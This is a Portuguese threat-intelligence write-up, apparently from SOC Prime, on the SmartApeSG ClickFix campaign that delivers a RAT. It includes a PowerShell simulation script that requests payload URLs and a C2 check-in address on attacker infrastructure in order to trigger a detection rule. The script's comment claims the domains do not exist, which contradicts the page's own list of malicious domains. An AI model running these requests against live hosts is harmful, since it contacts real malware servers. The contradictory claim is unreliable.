SOC Prime Bias: High

05 Aug 2026 07:42 UTC

SmartApeSG Distribui um RAT Desconhecido Através de Iscas ClickFix

Author Photo
SOC Prime Team linkedin icon Seguir
SmartApeSG Distribui um RAT Desconhecido Através de Iscas ClickFix
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

A campanha SmartApeSG usa a técnica ClickFix para enganar usuários a executar comandos maliciosos através de páginas falsas de CAPTCHA ou verificação humana. Esta ação lança um arquivo HTA que faz download e extrai um arquivo ZIP malicioso. A carga final é um Trojan de Acesso Remoto (RAT) não identificado que depende do carregamento lateral de DLL para estabelecer persistência e se comunicar com sua infraestrutura C2.

Investigação

A investigação incluiu a análise de tráfego HTTPS, arquivos PCAP e arquivos maliciosos ligados à atividade do SmartApeSG. Pesquisadores identificaram JavaScript malicioso injetado em sites legítimos e rastrearam a cadeia de infecção de um comando injetado na área de transferência até a conexão final com o C2. Observou-se o RAT comunicando-se com um endereço IP externo pela porta 443 usando tráfego criptografado.

Mitigação

As organizações devem usar filtragem da web para bloquear domínios maliciosos conhecidos, incluindo pewtercanto[.]top and deltaode[.]com. Os usuários devem ser treinados para reconhecer métodos de engenharia social, como CAPTCHAs falsos e instruções do ClickFix. Restringir a execução de arquivos HTA e monitorar processos filhos suspeitos lançados por navegadores ou comandos Run pode reduzir ainda mais o risco.

Resposta

Se a atividade do SmartApeSG for detectada, o endpoint afetado deve ser isolado imediatamente para interromper a comunicação C2. Investigadores devem examinar os diretórios AppData e Documentos para identificar o RAT e seus mecanismos de persistência. A telemetria do endpoint também deve ser revisada para execução não autorizada de HTA, manipulação de área de transferência e atividade de carregamento lateral de DLL.

Fluxo de Ataque

Execução de Simulação

Pré-requisito: A Verificação Pre-flight de Telemetria e Linha de Base deve ter sido aprovada.

Justificativa: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a um diagnóstico incorreto.

  • Narrativa e Comandos do Ataque: O adversário está executando a campanha ClickFix do SmartApeSG. Após um usuário ser enganado em uma ação maliciosa (frequentemente uma atualização de navegador falsa), o sistema tenta baixar um arquivo HTA malicioso. O HTA então inicia uma conexão com a infraestrutura C2 para baixar a carga final do RAT. Para simular isso, geraremos requisições de rede que atingem as exatas strings definidas na lógica de detecção: deltaode.compo, deltaode.com/wv, e o IP 89.124.79.98.

  • Script de Teste de Regressão:

     # Script de simulação para acionar a regra de detecção do SmartApeSG
      # Este script simula as requisições de rede para os IoCs específicos
    
      $urls = @(
          "https://deltaode.compo/payload.hta",
          "https://deltaode.com/wv/malicious.exe",
          "http://89.124.79.98:443/c2_checkin"
      )
    
      foreach ($url in $urls) {
          Write-Host "Simulando requisição para: $url"
          try {
              # Usando Invoke-WebRequest para gerar a telemetria de rede
              # Usamos -ErrorAction SilentlyContinue porque estes domínios na verdade não existem
              Invoke-WebRequest -Uri $url -UseBasicParsing -ErrorAction SilentlyContinue
          } catch {
              Write-Host "Requisição falhou (esperado), mas a telemetria deve ser gerada."
          }
      }
  • Comandos de Limpeza:

     # Nenhuma alteração permanente foi feita no sistema; nenhuma limpeza é necessária.
      Write-Host "Simulação completa. Nenhum artefato deixado no sistema."